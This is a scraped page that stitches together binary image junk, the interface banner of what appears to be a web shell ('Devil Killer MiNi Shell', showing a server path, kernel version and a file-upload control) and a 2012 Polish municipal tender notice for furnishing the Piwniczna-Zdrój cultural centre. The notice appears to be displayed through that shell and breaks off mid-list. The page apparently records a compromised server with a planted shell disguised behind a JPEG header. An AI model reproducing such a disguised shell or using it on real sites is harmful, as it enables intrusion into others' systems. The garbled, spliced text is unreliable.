JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121030/229859-N-2012.html

<p class="kh_header"><b>Piwniczna-Zdrój: Dostawa wraz z montażem wyposażenia do Domu Kultury    w Piwnicznej-Zdroju</b><br>
<b>Numer ogłoszenia: 229859 - 2012; data zamieszczenia: 30.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy Piwniczna-Zdrój , ul. Rynek 20, 33-350 Piwniczna-Zdrój, woj. małopolskie, tel. 0-18 4464043, faks 0-18 4464186.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piwniczna.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z montażem wyposażenia do Domu Kultury    w Piwnicznej-Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.WYPOSAŻENIA BIBLIOTEKI W BUDYNKU MGOK W PIWNICZNEJ-ZDROJU.
1.1	SALONIK  PRASOWY

	Nazwa produktu	Do opisu przyjęto produkty z katalogu. Dopuszcza się zastosowanie innych produktów o parametrach nie gorszych niż wskazane w  wykazie	Wymiary(cm)	Ilość (szt)
1.1	fotel	fotel obrotowy czarny  z regulowaną wysokością  obicie tapicerowane, kółka	66x68x72	4
1.2	stolik 	stolik okrągły z dwoma blatami ,na kółkach,wykonany z stali, powłoka niklowa , bezbarwny lakier,poliuretanowy, cynk, szkło hartowane, szkliwo, biały  	o50x62	2


1.2	BIBLIOTEKA I CZYTELNIA

	Nazwa produktu	Do opisu przyjęto produkty z katalogu. Dopuszcza się zastosowanie innych produktów o parametrach nie gorszych niż wskazane w wykazie	Wymiary(cm)	Ilość (szt)
1.3	stół	słół okrągły biały Blat: Płyta pilśniowa, Farba akrylowaNoga: tworzywo poliamidowe zbrojonePłyta górna)Noga wewnętrzna: stal, Barwiona szpachla epoksydowo)poliestrowa w proszku 	O105x75	2
1.4	krzesło obrotowe	tworzywo poliamidowe,barwiona szpachla epoksydowo)poliestrowa w proszku,stal, tworzywo polipropylenowe	55x50x77	16
1.5	biurko	Części główne) Szyna: stal, Barwiona szpachla epoksydowo)poliestrowa w proszkuPanel górny: tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu), Płyta wiórowa, folia melaminowa, folia melaminowa	139x72x74	6
1.6	Lada recepcyjna	np. system VALDE (LVP10+LVP13+LVL13+LVL10) kolor biały pastel, front zielony poler	78x322x110	1

REGAŁY PÓŁKOWE LEKKIEJ KONSTRUKCJI METALOWEJ

	Nazwa produktu	Do opisu przyjęto produkty z katalogu. Dopuszcza się zastosowanie innych produktów o parametrach nie gorszych niż wskazane w wykazie	Wymiary(cm)	Ilość (szt)
1.7	regał - 5 półek	stabilna konstrukcja nośność półki: 90 kg cztery przestawne półki metalowe,regał skręcany możliwość złożenia regału w poziomie malowanie proszkowe, kolor grafit	95x40x170	43
1.8	regał - 4 półki	stabilna konstrukcja,nośność półki: 90 kg ,pięć przestawnych półek metalowych,sposób montażu: regał skręcany,możliwość złożenia regału w poziomie,malowanie proszkowe, grafit	95x40x180	95

			

Powyższe wyposażenie należy dostarczyć i  zamontować zgodnie z załączonemy projektem wyposażenia 


2. ZESTAWIENIE WYPOSAŻENIA W BUDYNKU SALI WIELOFUNKCYJNEJ MGOK W PIWNICZNEJ- ZDROJU
2.1	SZATNIA

	Nazwa produktu	Do opisu przyjęto produkty z katalogu. Dopuszcza się zastosowanie innych produktów o parametrach nie gorszych niż wskazane w wykazie model	Wymiary(cm)	Ilość (szt)
2.1.1	lada	np. LADA L3	150x70x110	3
2.1.2	Listwa ścienna  z wieszakami	np. Typ NSA	dł. 190	2

2.2	SALA WIELOFUNKCYJNA

	Nazwa produktu		Do opisu przyjęto produkty z katalogu. Dopuszcza się zastosowanie innych produktów o parametrach nie gorszych niż wskazane w wykazie model	Wymiary(cm)	Ilość (szt)
2.2.1	Krzesło konferencyjne		krzesło konferencyjne na czterech nogach obicie tapicerowane Stelaż wykonany z rury kształtowej o bardzo dużej wytrzymałości na odkształcenia. Stelaż chromowany lub malowany proszkowo. kolor grafitowy	150x70x110	111
2.2.2	Scena ze stopniami	scena- podest na konstrukcji stalowej wykończony drewnem. Profile stalowe zamknięte 3x3cm malowane.  Wykończenie podestu, frontu i stopni  deską podłogową klejoną na płycie OSB. 	870x400(34 m2)Światło pod sceną min. 60cm.	1
2.2.3	Szafka na wzmacniacz i zwrotnicę		Stojąca szafa do profesjonalnej zabudowy urządzeń teleinformatycznych skonstruowanych w oparciu o system 19  oraz urządzeń Audio Video. systemu wyposażenia biura lub domu.Zestaw zawiera:obudowa 19  cokół na kółkach i stopkach poziomujących -.uchwyty ,akcesoria do montażu  np. Stojąca szafa MEDIArack19 -FL	150x70x110	1
2.2.4	Blat pod mikser		np. VIKA BYSKE	70x200x85	1
2.2.5	Podstawa		np. VIKA  MOLIDEN	62x10x70	2

2.3	GARDEROBA

	Nazwa produktu	Do opisu przyjęto produkty z katalogu. Dopuszcza się zastosowanie innych produktów o parametrach nie gorszych niż wskazane w wykazie model model	Wymiary(cm)	Ilość (szt)
2.3.1	Szafka ubraniowa stalowa dwudzielna		60x49x180	1
2.3.2	Krzesło konferencyjne	krzesło konferencyjne na czterech nogach obicie tapicerowane Stelaż wykonany z rury kształtowej o bardzo dużej wytrzymałości na odkształcenia. Stelaż chromowany lub malowany proszkowo. kolor grafitowy	50x150x110	2
2.3.3	Biurko	Otwór na kable z tyłu; - Starannie wykończona również część tylna; nadaje się do ustawienia na środku pokoju.- Regulowana wysokość nóg  Blat: Płyta pilśniowa, Płyta wiórowa, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu), foliaPanel tylny: Płyta pilśniowa, folia, Płyta wiórowa, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu)Szyna spodnia: Płyta wiórowa, folia, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu)Półka: Płyta pilśniowa, foliaPanel boczny: Płyta wiórowa, Płyta pilśniowa, folia, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu) kolor biały	60x120x74	1
2.3.4	Lustro ścienne	owal	60x60	1
2.3.5	Wieszak na ubrania	Maksymalne obciążenie: 30 kg stal barwiona szpachla epoksydowa w proszku	60X118	1

2.4	GARDEROBA	

	Nazwa produktu	Do opisu przyjęto produkty z katalogu. Dopuszcza się zastosowanie innych produktów o parametrach nie gorszych niż wskazane w wykazie model	Wymiary(cm)	Ilość (szt)
2.4.1	Szafka ubraniowa stalowa dwudzielna	popielaty	60x49x180	2
2.4.2	Krzesło konferencyjne	krzesło konferencyjne na czterech nogach obicie tapicerowane Stelaż wykonany z rury kształtowej o bardzo dużej wytrzymałości na odkształcenia. Stelaż chromowany lub malowany proszkowo. kolor grafitowy	50x150x110	4
2.4.3	Biurko	- Otwór na kable z tyłu; - Starannie wykończona również część tylna; nadaje się do ustawienia na środku pokoju.- Regulowana wysokość nóg  Blat: Płyta pilśniowa, Płyta wiórowa, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu), foliaPanel tylny: Płyta pilśniowa, folia, Płyta wiórowa, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu)Szyna spodnia: Płyta wiórowa, folia, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu)Półka: Płyta pilśniowa, foliaPanel boczny: Płyta wiórowa, Płyta pilśniowa, folia, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu) kolor biały 	60x120x74	4
2.4.4	Lustro ścienne	owal	60x60	4
2.4.5	Wieszak na ubrania	Maksymalne obciążenie: 30 kg stal barwiona szpachla epoksydowa w proszku	60x118	3
	
Powyższe wyposażenie należy dostarczyć i  zamontować zgodnie z załączonym  projektem wyposażenia

3. WYPOSAŻENIE BIURA  ORAZ SAL DO ĆWICZEŃ

	Nazwa produktu	Do opisu przyjęto produkty z katalogu. Dopuszcza się zastosowanie innych produktów o parametrach nie gorszych niż wskazane w wykazie model model	Wymiary(cm)	Ilość (szt)
3.1	biurka	Otwór na kable z tyłu; - Starannie wykończona również część tylna; nadaje się do ustawienia na środku pokoju.- Regulowana wysokość nóg  Blat: Płyta pilśniowa, Płyta wiórowa, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu), foliaPanel tylny: Płyta pilśniowa, folia, Płyta wiórowa, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu)Szyna spodnia: Płyta wiórowa, folia, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu)Półka: Płyta pilśniowa, foliaPanel boczny: Płyta wiórowa, Płyta pilśniowa, folia, tworzywo ABS (kopolimery akrylonitrylu, butadienu i styrenu) kolor  orzech lub calvados, olcha	60x120x74	4
3.2	krzesło biurowe  obrotowe	obicie tapicerowane, obrotowe, kółka- kolor czarny	75*5*105	4
3.3	stół składany prostokątny 	Wykonanie: baza metalowa malowana proszkowo, z mechanizmem składania nóg w celu optymalnego magazynowania, Stół posiada stelaż ramowy, dzięki czemu jego konstrukcja jest wzmocniona  Blat wykonany z płyty meblowej o gr. 18 mm,  kolor , buk  	180x80x75	10
3.4	Stół składany kwadratowy	Wykonanie: baza metalowa malowana proszkowo, z mechanizmem składania nóg w celu optymalnego magazynowania, Stół posiada stelaż ramowy, dzięki czemu jego konstrukcja jest wzmocniona  Blat wykonany z płyty meblowej o gr. 18 mm,  kolor , buk 	80x80x75	15
3.5	wieszak stojący	podstawa marmurowa, drewno, chrom	37x176x37	4
3,6	szafa aktowa	wieńce górne i szaf i regałów wykonane z płyty melaminowej, orzech, półki mocowane za pomocą złaczy zabezpieczających przed wysunięciem, zamek patentowy z kombinacją	183x80x38	4
3.7	Krzesło obrotowe	Oparcie i siedzisko krzesła wykonane z trwałej sklejki bukowej, wyposażone w stalową wytrzymałą podstawę oraz antypoślizgowy podnóżek posiadające regulowaną wysokość	Wysokość 92,5 - 118,5Wys. Siedziska ; 55,5 -81,5Wys.oparcia: 37Głębokość i szer. Siedziska - 40	4
3.8	Kontenr mobilny	Posiada 3 szuflady na centralny zamek, na kółkach, kolor - orzech 	60x54x43	3
3.9	Szafy biurowe	Z płyty melaminowej, orzech, drzwiczki z zamkiem, 5 obszernych półek	183x80x38	5
3.10	Wieszak jednostronny )np.ŁSZ 1)	Ławko wieszak wyk. Z elementów metalowych i drewnianych	1650x1500x380	8
3.11	Krzesła składane	Siedzenie z polietylenu, wytrzymałe, stalowa rama, powłoka węglanowa	Rozłóż.46x88x45Złożone 45x114x6,5Siedzisko 42x40Waga 5 kg	40
3.12	Zestaw mebli biurowych 	-Biurko gabinetowe. Struktura wykończona fornirowanym drewnem w odcieniu wiśniowego brązu ,                 - boczna komoda z blatem i przegrodami,                           - kontener pod blat z szufladami	 180x90x76100x50x7640x53x60	1
3.13	Fotel biurowy obrotowy	Ze skóry naturalnej ,szerokie siedzisko, profilowane oparcie na odcinku lędźwiowym	Wys. Siedz. 49-59 , wys.oparcia 67,gł.siedziska 52,szer.siedziska 53	1
3.14	Komplety luster do Sali prób ze wspornikami i drążkami	Lustra posturograficzne malowane ze wspornikami podwójnymi i drążkami do  ćwiczeń taneczno-baletowych	2x1	10
3.15	Magazyn strojów Zespołów regionalnych- garderoba	Wyszczególnienie: Płyta meblowa oklejana okleiną PCV 1mm gr.Systemy jezdne do drzwi przesuwnych Laguna w kolorze srebrnymPółki ze wzmocnieniami Rączki do drzwi Multi OmegaProwadnice szuflad BLUM pełny wysuw 30 kg udźwig Dno szuflad płyta 18 mmKolor szafy: dąb jasny Kolor regałów: buk 	Półka 196 x 24  - 2szt. Regał 208 x 91 x 38  - 2 szt.  Drzwi przesuwne 202 x 198  Szafa przesuwna 280 c 560 x 70  	komplet
3.15	Ławo-stół	Płyta laminowana, szkło piaskowe, elementy ozdobne z tworzywa ABS , rozkładana 	110/150x60x55	1
3.16	Ścianki wystawowe	Konstrukcja z profilów aluminiowych anodowanycho przekroju koła umożliwiających łączenie paneli pod kątem 90 lub 180 st. Co umożliwia zbudowanie ścianki z dowolnej liczby paneli, kolor srebrny mat - profil okrągły, wypełnienie ścianek - płyta PVC 4 mmm, podstawy stabilizujące - kręgi betonowe z osłoną z tworzywa	70x100	8
3.17	Ścianki ekspozycyjne	Wykonane z lekkiego prostego profila z podziałem poziomym. Rozkładane do formatu ? panela, wykonane z prolili o cechach zawiasu	szerokośćA = 103xwys.B=200cm format wypełnienia 100x97 - 2 szt	10
3.18	pianino cyfrowe	pełni ważona klawiatura (88 klawiszy,RH3), 3 pozomy regulacji dynamiki, 30 brzmień ( próbka fortepianu koncertowego), polifonia 60 dzwięków, 30 utworów demo, efekty Reverb i Chorus, metronom, 3 pedały, 2 wejścia słuchawkowe, funkcja transpozycji, wbudowane nagłosnienie ( 2x11W), złącza MIDI		
3.19	keyboard instrument klawiszowy	61 klawiszowa,reagująca na dotyk klawiatura z z min. 731 naturalnymi brzmieniami i funkcją Arpeggio automatycznie generująca frazy , oparte na akordach,pokretła służące do kontroli w czasie rzeczywistym, funkacja , pokrętła Pitch Bend, służace do kontroli wysokości dzwięku w czasie rzeczywistym, muzyczna baza danych min 305 utworów do szybkich ustawien keybordu, min 5 brzmień Sweet, min 3 brzmienia Cool, min 3 brzmienia Dynamic, min 206 naturalnych brzmień+ min 462 brzmień XG-Life+ min 15 Drum/SFX kits + min 40 Arpeggio, min 32 profili, podświetlony wyświetlacz LCD min 92 mm x min 42 mm, min 2 gałki dla filtrów i efektów, min dwudrożny system głośników min 2x min 2,5 Watt, wymiary  około 946x402x136 mm, waga 7kg kolor czarny, port usb to host i usb to device, instrukcja w języku polskim, zasilacz w zestawie 		
3.20	Listwa do podwieszania obrazów	listwa wykonana  z profilu aluminiowego anodowanego na kolor srebrny. listwy mocowane do ściany za pomocą kołków rozporowych. Do listwy włożony detal np. SP2-41, mocujący linkę np. SP2-09, posiadający możliwość przesuwania wzdłuż długości profila. Do linki mocowany hak np. MZ-026 dopuszcaalen obciązemnie listwy około 40 kg/mb	od 200 mb do 2,5 mb 	10


4. MUZEUM
	Nazwa produktu	Do opisu przyjęto produkty z katalogu. Dopuszcza się zastosowanie innych produktów o parametrach nie gorszych niż wskazane w wykazie model model	Wymiary(cm)	Ilość (szt)
4.1	gabloty muzalne 	gabloty wykonane z profili aluminiowych  anodowanych z oszkloną częścią ekspozycyjną , wykonana z profili owalnych, kopuła w profilach- szkło hartowane, otwierana z boku lub od frontu - szyby suwane	100x70x70x30	4
4.2	witryny stojące na cokole	wykonane z profili aluminowych anodowanych, profile owalne, malowane proszkowo ( kolor do uzgodnienia z Zamawaijącym) , szkło hartowane, plecy gabloty także wypełnione ze szkła , zamek patentowy,  z uchytami na wieszaki 	100x50x100	2
4.3	witryny stojące na cokole	wykonane z profili aluminowych anodowanych, profile owalne, malowane proszkowo ( kolor do uzgodnienia z Zamawaijącym) , szkło hartowane, plecy gabloty także wypełnione ze szkła , zamek patentowy,  z półkami	190x120x100odległośc między półkami 90x80	1
4.4	witryny stojące na szafce	wykonane z profili aluminowych anodowanych, profile owalne, malowane proszkowo ( kolor do uzgodnienia z Zamawaijącym) , szkło hartowane, plecy gabloty także wypełnione ze szkła , zamek patentowy,  z półkami	230x70x70wysokości oszklonej gabloty 170, wysokość szafki 60 	1
4.5	systemy modułowe scienne	konstrukcja nośna wykonana z profili aluminiowych, płaszczyzny pionowe ścian obłożone płytą MDF o grubości min 8 mm, szara, surowa. Płaszczyzny ekspozycyjne gruntowane  pozwalające wykończenie powierzchni Ściany przy uzyciu wieli technik stosowanych przy wykończeniu wnętrz np. malowanie farbamiw zestawie elementy pozwalające na łaczenie ze sobą kolejnuch modułów. ściany wyposażone w stopki do wypoziomowania. System powinien posiadać  możliwośc rozbudowy ścian poprzez dołączanie kolejnych modułów ścon w linii prostej lub w układzie kątowym, gdzie kolejne Ściany dołączane są po kontem prostym. System powinien pozwalać na łatwy demontaż Ścian na pojedyńcze lekkie elementy w celu ich przenoszenia lub składowania. System powinien  posiadać moźliwośc zamocowania w gónej części listwy aluminiowej pozwalającej na zamocowanie przesuwanych względem listwy zawiesi.	240x200x50	12 
4.6	Listwa do podwieszania obrazów	listwa wykonana  z profilu aluminiowego anodowanego na kolor srebrny. listwy mocowane do ściany za pomocą kołków rozporowych. Do listwy włożony detal np. SP2-41, mocujący linkę np. SP2-09, posiadający możliwość przesuwania wzdłuż długości profila. Do linki mocowany hak np. MZ-026 dopuszcaalen obciązemnie listwy około 40 kg/mb	od 200 mb do 2,5 mb 	


5.Wszystkie oferowane materiały muszą być fabczycznie nowe, nieregenerowane, wolne od wad fizycznych           i prawnych, nie mają do nich praw osoby trzecie oraz nie jest przedmiotem żadnego postępowania                        i zabezpieczenia.
6.W przypadku wskazania w opisie przedmiotu zamówienia , oraz  w załaczniku nr 1 do oferty , znaku towarowego, patentu lub pochodzenia służy jedynie do celów identyfikacyjnych, do określenia ich kompatybilności. Nazwy stanowią jedynie precyzyjne określenie klasy oraz parametrów technicznych produktów wymaganych przez Zamawiającego. w myśl art.29 ust.3 ustawy Prawo zamówień publicznych - zamawiający dopuszcza możłiwość składania ofert jakościowo równoważnych, spełniających równoważne parametry określone w opisie oraz  w załaczniku nr 1 do oferty.
Przez produkt równoważny Zamawiający rozumie produkt kompatybilny ze sprzętem, do którego jest zamówiony, o parametrach takich samych bądż lepszych w stosunku do oryginału produktu przez producenta urządzenia.
7.Materiały i wyroby winny być odpowiednio oznaczone i posiadać wszelkie dokumenty określone szczegółowymi przepisami dotyczącymi trybu dopuszczenia ich do stosowania jak: certyfikat na znak bezpieczeństwa, aktualną aprobatę techniczną, deklarację zgodności z Polską Normą, atest higieniczny, określenie klasyfikacji ogniowej , gwarancje itp.
8. Nazwy / kody określone dla przedmiotu zamówienia we Wspólnym Słowniku Zamówień

Kod CPV 
39150000-8 Różne meble i wyposażenie.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8, 37.31.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> VIII. Wymagania dotyczące wadium
 1. Zamawiający wymaga wniesienia wadium 
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 4000,00 słownie: cztery tysiące złotych 00)100
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1)	w pieniądzu, przelewem na rachunek bankowy: 
 BS Piwniczna 62 8813 0004 2001 0000 7100 0001    z adnotacją )wadium - Dostawa wraz z montażem wyposażenia do Domu Kultury    w Piwnicznej-Zdroju  
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3)	w gwarancjach bankowych, 
4)	w gwarancjach ubezpieczeniowych 
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275)  w terminie 2012-11-07, sposób przekazania: orginał dołaczony do oferty
4. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
5. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
6. W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę realizacji co najmniej  1 zamówienia   w zakresie wyposażenia w meble wraz z montażem o łącznej wartości nie mniejszej niż 70 000,00 złotych brutto  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę -posiadanie środków finansowych lub zdolności kredytowej              w wysokosci nie mniejszej niż 70 000,00 zł oraz posiadanie ubezpieczenia od odpowiedzialnosci cywilnej               w zakresie prowadzonej działalności na kwotę nie mniejszą niż      70 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
